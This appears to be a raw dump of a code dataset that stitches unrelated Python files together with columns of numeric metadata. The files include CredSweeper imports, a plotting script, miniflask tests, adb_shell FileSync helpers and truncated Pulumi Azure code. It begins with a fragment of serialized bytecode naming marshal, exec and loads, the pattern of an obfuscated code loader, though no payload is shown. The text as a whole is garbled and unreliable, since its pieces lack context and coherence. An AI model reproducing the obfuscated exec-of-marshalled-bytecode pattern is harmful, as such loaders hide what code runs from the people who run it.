shal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\n<kingtebe>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\n<kingtebe>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\n<kingt
ebe>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\n<kingtebe>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\n<kingtebe>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\n<kingtebe>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01'))
| 3,513.666667
| 20,998
| 0.778769
| 4,252
| 21,082
| 3.846425
| 0.211665
| 0.233323
| 0.198655
| 0.18343
| 0.423479
| 0.368756
| 0.330969
| 0.317028
| 0.299175
| 0.290737
| 0
| 0.313344
| 0.009677
| 21,082
| 6
| 20,998
| 3,513.666667
| 0.470016
| 0.002893
| 0
| 0
| 0
| 1.5
| 0.864307
| 0.622229
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 1
| 0
| 1
| 0.5
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 1
|
0
| 16
|
a426c010e109d7bca127716868620e8023e00378
| 415
|
py
|
Python
|
credsweeper/filters/group/__init__.py
|
cuspymd/CredSweeper
|
376e7faff41d8b58f0d9e2a82955ad0929ee8290
|
[
"MIT"
] | 17
|
2021-10-22T00:29:46.000Z
|
2022-03-21T03:05:56.000Z
|
credsweeper/filters/group/__init__.py
|
shadowscatcher/CredSweeper
|
0387ed76aca4a12154e15c49db8dc0901a014275
|
[
"MIT"
] | 29
|
2021-11-05T21:10:51.000Z
|
2022-03-30T10:41:08.000Z
|
credsweeper/filters/group/__init__.py
|
shadowscatcher/CredSweeper
|
0387ed76aca4a12154e15c49db8dc0901a014275
|
[
"MIT"
] | 16
|
2021-11-05T20:39:54.000Z
|
2022-03-11T00:57:32.000Z
|
from credsweeper.filters.group.group import Group # isort:skip
from credsweeper.filters.group.general_keyword import GeneralKeyword
from credsweeper.filters.group.general_pattern import GeneralPattern
from credsweeper.filters.group.password_keyword import PasswordKeyword
from credsweeper.filters.group.pem_pattern import PEMPattern
from credsweeper.filters.group.url_credentials_group import UrlCredentialsGroup
| 51.875
| 79
| 0.884337
| 50
| 415
| 7.22
| 0.38
| 0.249307
| 0.365651
| 0.448753
| 0.188366
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.06747
| 415
| 7
| 80
| 59.285714
| 0.932817
| 0.024096
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.166667
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
a427419eefeee70caf121b5ea3946d6081a0f33e
| 471
|
py
|
Python
|
drivers/plot_cdf_rp_agecut_KS_test.py
|
lgbouma/gilly
|
b3bc7cf53c28eee6420cd85c3975062d4f46c611
|
[
"MIT"
] | null | null | null |
drivers/plot_cdf_rp_agecut_KS_test.py
|
lgbouma/gilly
|
b3bc7cf53c28eee6420cd85c3975062d4f46c611
|
[
"MIT"
] | null | null | null |
drivers/plot_cdf_rp_agecut_KS_test.py
|
lgbouma/gilly
|
b3bc7cf53c28eee6420cd85c3975062d4f46c611
|
[
"MIT"
] | null | null | null |
import numpy as np
from gilly.plotting import plot_cdf_rp_agecut_KS_test
# Run the KS-test CDF plots for every combination of rotation-period
# source and gyrochronology calibration, sweeping age cuts 0.7-1.5 Gyr.
# Call order matches the original script: all VSINI runs first, then M15,
# with SL20 before A19 at each age cut.
for prot_source in ('VSINI', 'M15'):
    for agecut in 1e9 * np.arange(0.7, 1.6, 0.1):
        for gyro_source in ('SL20', 'A19'):
            plot_cdf_rp_agecut_KS_test(agecut=agecut,
                                       Prot_source=prot_source,
                                       gyro_source=gyro_source)
| 42.818182
| 81
| 0.764331
| 94
| 471
| 3.478723
| 0.308511
| 0.107034
| 0.137615
| 0.229358
| 0.865443
| 0.865443
| 0.801223
| 0.801223
| 0.801223
| 0.801223
| 0
| 0.065882
| 0.097665
| 471
| 10
| 82
| 47.1
| 0.703529
| 0
| 0
| 0.25
| 0
| 0
| 0.063694
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a46f7de7fe58dcbe708e4473d6947e1e8491ff37
| 33
|
py
|
Python
|
src/masonite/orm/blueprint/__init__.py
|
Marlysson/orm
|
ec2f3e3c107135c95ecddc5034c809114344c880
|
[
"MIT"
] | null | null | null |
src/masonite/orm/blueprint/__init__.py
|
Marlysson/orm
|
ec2f3e3c107135c95ecddc5034c809114344c880
|
[
"MIT"
] | null | null | null |
src/masonite/orm/blueprint/__init__.py
|
Marlysson/orm
|
ec2f3e3c107135c95ecddc5034c809114344c880
|
[
"MIT"
] | null | null | null |
from .Blueprint import Blueprint
| 16.5
| 32
| 0.848485
| 4
| 33
| 7
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 33
| 1
| 33
| 33
| 0.965517
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
a4721283725798b1b7e6875be3aed206d66f9fc3
| 2,702
|
py
|
Python
|
tests/argparse/special/test_overwrite.py
|
da-h/miniflask
|
d5e594153cca4ce4d30db01b1d06d05afa9e7aaa
|
[
"MIT"
] | 5
|
2020-02-17T12:14:36.000Z
|
2020-02-27T12:09:05.000Z
|
tests/argparse/special/test_overwrite.py
|
da-h/miniflask
|
d5e594153cca4ce4d30db01b1d06d05afa9e7aaa
|
[
"MIT"
] | 69
|
2020-04-03T08:16:35.000Z
|
2021-12-21T15:46:29.000Z
|
tests/argparse/special/test_overwrite.py
|
da-h/miniflask
|
d5e594153cca4ce4d30db01b1d06d05afa9e7aaa
|
[
"MIT"
] | 1
|
2020-04-02T15:46:39.000Z
|
2020-04-02T15:46:39.000Z
|
from pathlib import Path
import pytest
import miniflask # noqa: E402
def test_setup(capsys):
    """With only "defaults" loaded, every variable keeps its registered
    value except the one overridden on the command line."""
    flask = miniflask.init(
        module_dirs=str(Path(__file__).parent / "modules"),
        debug=True,
    )
    flask.load(["defaults"])
    flask.parse_args(["--var_default_override_twice_and_cli", "1114"])
    capsys.readouterr()  # discard output produced during setup
    flask.event.print_all()
    printed = capsys.readouterr().out
    expected = """
modules.defaults.var_default: 1
modules.defaults.var_default_override: 2
modules.defaults.var_default_override_twice: 3
modules.defaults.var_default_override_twice_and_cli: 1114
""".lstrip()
    assert printed == expected
def test_override(capsys):
    """Loading "defaults_override" on top of "defaults" replaces the two
    overridable values; the CLI flag still wins for the last variable."""
    mf = miniflask.init(
        debug=True,
        module_dirs=str(Path(__file__).parent / "modules"),
    )
    mf.load(["defaults", "defaults_override"])
    mf.parse_args(["--var_default_override_twice_and_cli", "1114"])
    capsys.readouterr()  # flush whatever init/load/parse printed
    mf.event.print_all()
    printed = capsys.readouterr().out
    assert printed == """
modules.defaults.var_default: 1
modules.defaults.var_default_override: 12
modules.defaults.var_default_override_twice: 13
modules.defaults.var_default_override_twice_and_cli: 1114
""".lstrip()
def test_override_twice(capsys):
    """A second override module wins over the first for the twice-overridden
    variable; the CLI flag still wins over both."""
    mf = miniflask.init(
        debug=True,
        module_dirs=str(Path(__file__).parent / "modules"),
    )
    mf.load(["defaults", "defaults_override", "defaults_override_twice"])
    mf.parse_args(["--var_default_override_twice_and_cli", "1114"])
    capsys.readouterr()  # flush whatever init/load/parse printed
    mf.event.print_all()
    printed = capsys.readouterr().out
    assert printed == """
modules.defaults.var_default: 1
modules.defaults.var_default_override: 12
modules.defaults.var_default_override_twice: 113
modules.defaults.var_default_override_twice_and_cli: 1114
""".lstrip()
def test_override_conflict():
    """Overriding a variable that two sibling modules registered must fail
    with a RegisterError during argument parsing."""
    mf = miniflask.init(
        debug=True,
        module_dirs=str(Path(__file__).parent / "modules"),
    )
    mf.load(["defaults", "defaults2", "defaults_override"])
    with pytest.raises(miniflask.exceptions.RegisterError):
        mf.parse_args([])
        mf.event.print_all()
def test_override_scoped_absolute():
    """An absolutely-scoped override must parse cleanly even when two sibling
    modules register the same variable name (no RegisterError expected)."""
    mf = miniflask.init(
        debug=True,
        module_dirs=str(Path(__file__).parent / "modules"),
    )
    mf.load(["defaults", "defaults2", "defaults_override_scoped_absolute"])
    mf.parse_args([])
    mf.event.print_all()
def test_override_scoped_relative():
    """A relatively-scoped override must parse cleanly even when two sibling
    modules register the same variable name (no RegisterError expected)."""
    mf = miniflask.init(
        debug=True,
        module_dirs=str(Path(__file__).parent / "modules"),
    )
    mf.load(["defaults", "defaults2", "defaults_override_scoped_relative"])
    mf.parse_args([])
    mf.event.print_all()
| 26.752475
| 75
| 0.690229
| 327
| 2,702
| 5.357798
| 0.171254
| 0.085616
| 0.123288
| 0.171233
| 0.892123
| 0.892123
| 0.870434
| 0.855594
| 0.855594
| 0.855594
| 0
| 0.019811
| 0.178016
| 2,702
| 100
| 76
| 27.02
| 0.769023
| 0.003701
| 0
| 0.682927
| 0
| 0
| 0.341636
| 0.255019
| 0
| 0
| 0
| 0
| 0.036585
| 1
| 0.073171
| false
| 0
| 0.036585
| 0
| 0.109756
| 0.073171
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a4722ce518587afc5600253749d9a55bc2812ac1
| 3,392
|
py
|
Python
|
tests/filesync_helpers.py
|
KOLANICH-libs/adb_shell
|
bf4d348e3aa0999b24976de9bac442b0e180a27e
|
[
"Apache-2.0"
] | 268
|
2019-09-25T16:38:51.000Z
|
2022-03-31T07:08:17.000Z
|
tests/filesync_helpers.py
|
cyanogen/adb_shell
|
d60d94c831a23ffbe595aba045e7def6412f040c
|
[
"Apache-2.0"
] | 73
|
2019-09-30T14:25:38.000Z
|
2022-01-23T23:04:29.000Z
|
tests/filesync_helpers.py
|
cyanogen/adb_shell
|
d60d94c831a23ffbe595aba045e7def6412f040c
|
[
"Apache-2.0"
] | 48
|
2019-11-05T20:37:59.000Z
|
2022-03-09T08:12:06.000Z
|
import struct
from adb_shell import constants
class FileSyncMessage(object):  # pylint: disable=too-few-public-methods
    """A helper for building a FileSync message and packing its wire header.

    Parameters
    ----------
    command : bytes
        FileSync command ID; must be a key of :const:`adb_shell.constants.FILESYNC_ID_TO_WIRE`
    arg0 : int
        First header argument; when falsy, ``len(data)`` is used instead
    data : bytes
        The data that will be sent

    Attributes
    ----------
    arg0 : int
        First header argument (falls back to the payload length)
    command : int
        Integer wire form of the input ``command``, looked up in :const:`adb_shell.constants.FILESYNC_ID_TO_WIRE`
    data : bytes
        The data that will be sent
    """

    def __init__(self, command, arg0=None, data=b''):
        # Translate the mnemonic command ID into its integer wire form.
        self.command = constants.FILESYNC_ID_TO_WIRE[command]
        # NOTE(review): ``or``-style fallback means an explicit arg0 of 0 is
        # also replaced by len(data) -- confirm that is intended.
        self.arg0 = len(data) if not arg0 else arg0
        self.data = data

    def pack(self):
        """Serialize this message's header for the wire.

        Returns
        -------
        bytes
            ``command`` and ``arg0`` packed as two little-endian unsigned 32-bit ints
        """
        packed = struct.pack(b'<2I', self.command, self.arg0)
        return packed
class FileSyncListMessage(object):  # pylint: disable=too-few-public-methods
    """A helper for building FileSync messages for the "list" service.

    Parameters
    ----------
    command : bytes
        FileSync command ID; must be a key of :const:`adb_shell.constants.FILESYNC_ID_TO_WIRE`
    arg0 : int
        First header argument
    arg1 : TODO
        Second header argument
    arg2 : TODO
        Third header argument
    data : bytes
        The data that will be sent

    Attributes
    ----------
    arg0 : int
        First header argument
    arg1 : TODO
        Second header argument
    arg2 : TODO
        Third header argument
    arg3 : int
        The size of the data
    command : int
        Integer wire form of the input ``command``, looked up in :const:`adb_shell.constants.FILESYNC_ID_TO_WIRE`
    data : bytes
        The data that will be sent
    """

    def __init__(self, command, arg0, arg1, arg2, data=b''):
        # Translate the mnemonic command ID into its integer wire form.
        self.command = constants.FILESYNC_ID_TO_WIRE[command]
        self.arg0, self.arg1, self.arg2 = arg0, arg1, arg2
        self.arg3 = len(data)  # the header carries the payload size
        self.data = data

    def pack(self):
        """Serialize this message's header for the wire.

        Returns
        -------
        bytes
            The five header fields packed as little-endian unsigned 32-bit ints
        """
        header_fields = (self.command, self.arg0, self.arg1, self.arg2, self.arg3)
        return struct.pack(b'<5I', *header_fields)
class FileSyncStatMessage(object):  # pylint: disable=too-few-public-methods
    """A helper for building FileSync messages for the "stat" service.

    Parameters
    ----------
    command : bytes
        FileSync command ID; must be a key of :const:`adb_shell.constants.FILESYNC_ID_TO_WIRE`
    arg0 : int
        First header argument
    arg1 : TODO
        Second header argument
    arg2 : TODO
        Third header argument

    Attributes
    ----------
    arg0 : int
        First header argument
    arg1 : TODO
        Second header argument
    arg2 : TODO
        Third header argument
    command : int
        Integer wire form of the input ``command``, looked up in :const:`adb_shell.constants.FILESYNC_ID_TO_WIRE`
    data : bytes
        The data that will be sent (always empty)
    """

    def __init__(self, command, arg0, arg1, arg2):
        # Translate the mnemonic command ID into its integer wire form.
        self.command = constants.FILESYNC_ID_TO_WIRE[command]
        self.arg0, self.arg1, self.arg2 = arg0, arg1, arg2
        self.data = b''  # "stat" messages never carry a payload

    def pack(self):
        """Serialize this message's header for the wire.

        Returns
        -------
        bytes
            The four header fields packed as little-endian unsigned 32-bit ints
        """
        header_fields = (self.command, self.arg0, self.arg1, self.arg2)
        return struct.pack(b'<4I', *header_fields)
| 23.887324
| 116
| 0.576946
| 412
| 3,392
| 4.667476
| 0.18932
| 0.051482
| 0.034321
| 0.065523
| 0.895476
| 0.884035
| 0.884035
| 0.835673
| 0.799272
| 0.799272
| 0
| 0.020897
| 0.322818
| 3,392
| 141
| 117
| 24.056738
| 0.816282
| 0.535083
| 0
| 0.5
| 0
| 0
| 0.007867
| 0
| 0
| 0
| 0
| 0.184397
| 0
| 1
| 0.214286
| false
| 0
| 0.071429
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f17590f06958ae329687c226a4efcfda1e72979c
| 178
|
py
|
Python
|
tests/test__languages.py
|
vsvandelik/cubbitt-fixer
|
eacab30975b9087b7f1a987402dc70bedb16c4bf
|
[
"MIT"
] | null | null | null |
tests/test__languages.py
|
vsvandelik/cubbitt-fixer
|
eacab30975b9087b7f1a987402dc70bedb16c4bf
|
[
"MIT"
] | null | null | null |
tests/test__languages.py
|
vsvandelik/cubbitt-fixer
|
eacab30975b9087b7f1a987402dc70bedb16c4bf
|
[
"MIT"
] | null | null | null |
from fixer._languages import Languages
def test_get_language():
    """Known language codes resolve to the matching Languages member."""
    expectations = {"cs": Languages.CS, "en": Languages.EN}
    for code, member in expectations.items():
        assert Languages.get_language(code) == member
| 25.428571
| 55
| 0.752809
| 23
| 178
| 5.608696
| 0.478261
| 0.255814
| 0.27907
| 0.403101
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134831
| 178
| 6
| 56
| 29.666667
| 0.837662
| 0
| 0
| 0
| 0
| 0
| 0.022472
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
74d3c5e17bd77edfb1fd69d8b0fdbd796a5870a4
| 22,425
|
py
|
Python
|
sdk/python/pulumi_azure/apimanagement/email_template.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/apimanagement/email_template.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/apimanagement/email_template.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['EmailTemplateArgs', 'EmailTemplate']
# NOTE: generated by the Pulumi Terraform Bridge (tfgen) -- per the file header,
# do not hand-edit the code; only comments are added here.
@pulumi.input_type
class EmailTemplateArgs:
    # All five fields are required constructor inputs (no defaults).
    def __init__(__self__, *,
                 api_management_name: pulumi.Input[str],
                 body: pulumi.Input[str],
                 resource_group_name: pulumi.Input[str],
                 subject: pulumi.Input[str],
                 template_name: pulumi.Input[str]):
        """
        The set of arguments for constructing a EmailTemplate resource.
        :param pulumi.Input[str] api_management_name: The name of the API Management Service in which the Email Template should exist. Changing this forces a new API Management Email Template to be created.
        :param pulumi.Input[str] body: The body of the Email. Its format has to be a well-formed HTML document.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the API Management Email Template should exist. Changing this forces a new API Management Email Template to be created.
        :param pulumi.Input[str] subject: The subject of the Email.
        :param pulumi.Input[str] template_name: The name of the Email Template. Possible values are `AccountClosedDeveloper`, `ApplicationApprovedNotificationMessage`, `ConfirmSignUpIdentityDefault`, `EmailChangeIdentityDefault`, `InviteUserNotificationMessage`, `NewCommentNotificationMessage`, `NewDeveloperNotificationMessage`, `NewIssueNotificationMessage`, `PasswordResetByAdminNotificationMessage`, `PasswordResetIdentityDefault`, `PurchaseDeveloperNotificationMessage`, `QuotaLimitApproachingDeveloperNotificationMessage`, `RejectDeveloperNotificationMessage`, `RequestDeveloperNotificationMessage`. Changing this forces a new API Management Email Template to be created.
        """
        # Store each argument under its snake_case key via the pulumi.input_type machinery.
        pulumi.set(__self__, "api_management_name", api_management_name)
        pulumi.set(__self__, "body", body)
        pulumi.set(__self__, "resource_group_name", resource_group_name)
        pulumi.set(__self__, "subject", subject)
        pulumi.set(__self__, "template_name", template_name)
    # Each field below is exposed as a property pair: a getter annotated with its
    # camelCase wire name (where it differs) and a setter delegating to pulumi.set.
    @property
    @pulumi.getter(name="apiManagementName")
    def api_management_name(self) -> pulumi.Input[str]:
        """
        The name of the API Management Service in which the Email Template should exist. Changing this forces a new API Management Email Template to be created.
        """
        return pulumi.get(self, "api_management_name")
    @api_management_name.setter
    def api_management_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "api_management_name", value)
    @property
    @pulumi.getter
    def body(self) -> pulumi.Input[str]:
        """
        The body of the Email. Its format has to be a well-formed HTML document.
        """
        return pulumi.get(self, "body")
    @body.setter
    def body(self, value: pulumi.Input[str]):
        pulumi.set(self, "body", value)
    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Input[str]:
        """
        The name of the Resource Group where the API Management Email Template should exist. Changing this forces a new API Management Email Template to be created.
        """
        return pulumi.get(self, "resource_group_name")
    @resource_group_name.setter
    def resource_group_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "resource_group_name", value)
    @property
    @pulumi.getter
    def subject(self) -> pulumi.Input[str]:
        """
        The subject of the Email.
        """
        return pulumi.get(self, "subject")
    @subject.setter
    def subject(self, value: pulumi.Input[str]):
        pulumi.set(self, "subject", value)
    @property
    @pulumi.getter(name="templateName")
    def template_name(self) -> pulumi.Input[str]:
        """
        The name of the Email Template. Possible values are `AccountClosedDeveloper`, `ApplicationApprovedNotificationMessage`, `ConfirmSignUpIdentityDefault`, `EmailChangeIdentityDefault`, `InviteUserNotificationMessage`, `NewCommentNotificationMessage`, `NewDeveloperNotificationMessage`, `NewIssueNotificationMessage`, `PasswordResetByAdminNotificationMessage`, `PasswordResetIdentityDefault`, `PurchaseDeveloperNotificationMessage`, `QuotaLimitApproachingDeveloperNotificationMessage`, `RejectDeveloperNotificationMessage`, `RequestDeveloperNotificationMessage`. Changing this forces a new API Management Email Template to be created.
        """
        return pulumi.get(self, "template_name")
    @template_name.setter
    def template_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "template_name", value)
# NOTE: generated by the Pulumi Terraform Bridge (tfgen) -- per the file header,
# do not hand-edit the code; only comments are added here.
@pulumi.input_type
class _EmailTemplateState:
    # Unlike EmailTemplateArgs, every field here is optional: this class describes
    # a (possibly partial) known state used when looking up an existing resource.
    def __init__(__self__, *,
                 api_management_name: Optional[pulumi.Input[str]] = None,
                 body: Optional[pulumi.Input[str]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 subject: Optional[pulumi.Input[str]] = None,
                 template_name: Optional[pulumi.Input[str]] = None,
                 title: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering EmailTemplate resources.
        :param pulumi.Input[str] api_management_name: The name of the API Management Service in which the Email Template should exist. Changing this forces a new API Management Email Template to be created.
        :param pulumi.Input[str] body: The body of the Email. Its format has to be a well-formed HTML document.
        :param pulumi.Input[str] description: The description of the Email Template.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the API Management Email Template should exist. Changing this forces a new API Management Email Template to be created.
        :param pulumi.Input[str] subject: The subject of the Email.
        :param pulumi.Input[str] template_name: The name of the Email Template. Possible values are `AccountClosedDeveloper`, `ApplicationApprovedNotificationMessage`, `ConfirmSignUpIdentityDefault`, `EmailChangeIdentityDefault`, `InviteUserNotificationMessage`, `NewCommentNotificationMessage`, `NewDeveloperNotificationMessage`, `NewIssueNotificationMessage`, `PasswordResetByAdminNotificationMessage`, `PasswordResetIdentityDefault`, `PurchaseDeveloperNotificationMessage`, `QuotaLimitApproachingDeveloperNotificationMessage`, `RejectDeveloperNotificationMessage`, `RequestDeveloperNotificationMessage`. Changing this forces a new API Management Email Template to be created.
        :param pulumi.Input[str] title: The title of the Email Template.
        """
        # Only values that were actually supplied are stored, so absent fields
        # stay unset rather than being recorded as None.
        if api_management_name is not None:
            pulumi.set(__self__, "api_management_name", api_management_name)
        if body is not None:
            pulumi.set(__self__, "body", body)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if resource_group_name is not None:
            pulumi.set(__self__, "resource_group_name", resource_group_name)
        if subject is not None:
            pulumi.set(__self__, "subject", subject)
        if template_name is not None:
            pulumi.set(__self__, "template_name", template_name)
        if title is not None:
            pulumi.set(__self__, "title", title)
    # Property pairs mirror EmailTemplateArgs but with Optional types, plus the
    # extra description/title fields that only exist on fetched state.
    @property
    @pulumi.getter(name="apiManagementName")
    def api_management_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the API Management Service in which the Email Template should exist. Changing this forces a new API Management Email Template to be created.
        """
        return pulumi.get(self, "api_management_name")
    @api_management_name.setter
    def api_management_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "api_management_name", value)
    @property
    @pulumi.getter
    def body(self) -> Optional[pulumi.Input[str]]:
        """
        The body of the Email. Its format has to be a well-formed HTML document.
        """
        return pulumi.get(self, "body")
    @body.setter
    def body(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "body", value)
    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        The description of the Email Template.
        """
        return pulumi.get(self, "description")
    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)
    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the Resource Group where the API Management Email Template should exist. Changing this forces a new API Management Email Template to be created.
        """
        return pulumi.get(self, "resource_group_name")
    @resource_group_name.setter
    def resource_group_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "resource_group_name", value)
    @property
    @pulumi.getter
    def subject(self) -> Optional[pulumi.Input[str]]:
        """
        The subject of the Email.
        """
        return pulumi.get(self, "subject")
    @subject.setter
    def subject(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subject", value)
    @property
    @pulumi.getter(name="templateName")
    def template_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the Email Template. Possible values are `AccountClosedDeveloper`, `ApplicationApprovedNotificationMessage`, `ConfirmSignUpIdentityDefault`, `EmailChangeIdentityDefault`, `InviteUserNotificationMessage`, `NewCommentNotificationMessage`, `NewDeveloperNotificationMessage`, `NewIssueNotificationMessage`, `PasswordResetByAdminNotificationMessage`, `PasswordResetIdentityDefault`, `PurchaseDeveloperNotificationMessage`, `QuotaLimitApproachingDeveloperNotificationMessage`, `RejectDeveloperNotificationMessage`, `RequestDeveloperNotificationMessage`. Changing this forces a new API Management Email Template to be created.
        """
        return pulumi.get(self, "template_name")
    @template_name.setter
    def template_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "template_name", value)
    @property
    @pulumi.getter
    def title(self) -> Optional[pulumi.Input[str]]:
        """
        The title of the Email Template.
        """
        return pulumi.get(self, "title")
    @title.setter
    def title(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "title", value)
# NOTE: generated by the Pulumi Terraform Bridge (tfgen) -- per the file header,
# do not hand-edit the code; only comments are added here.
class EmailTemplate(pulumi.CustomResource):
    # Typing-only overload: keyword-argument construction.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 api_management_name: Optional[pulumi.Input[str]] = None,
                 body: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 subject: Optional[pulumi.Input[str]] = None,
                 template_name: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Manages a API Management Email Template.
        ## Import
        API Management Email Templates can be imported using the `resource id`, e.g.
        ```sh
         $ pulumi import azure:apimanagement/emailTemplate:EmailTemplate example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.ApiManagement/service/instance1/templates/template1
        ```
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] api_management_name: The name of the API Management Service in which the Email Template should exist. Changing this forces a new API Management Email Template to be created.
        :param pulumi.Input[str] body: The body of the Email. Its format has to be a well-formed HTML document.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the API Management Email Template should exist. Changing this forces a new API Management Email Template to be created.
        :param pulumi.Input[str] subject: The subject of the Email.
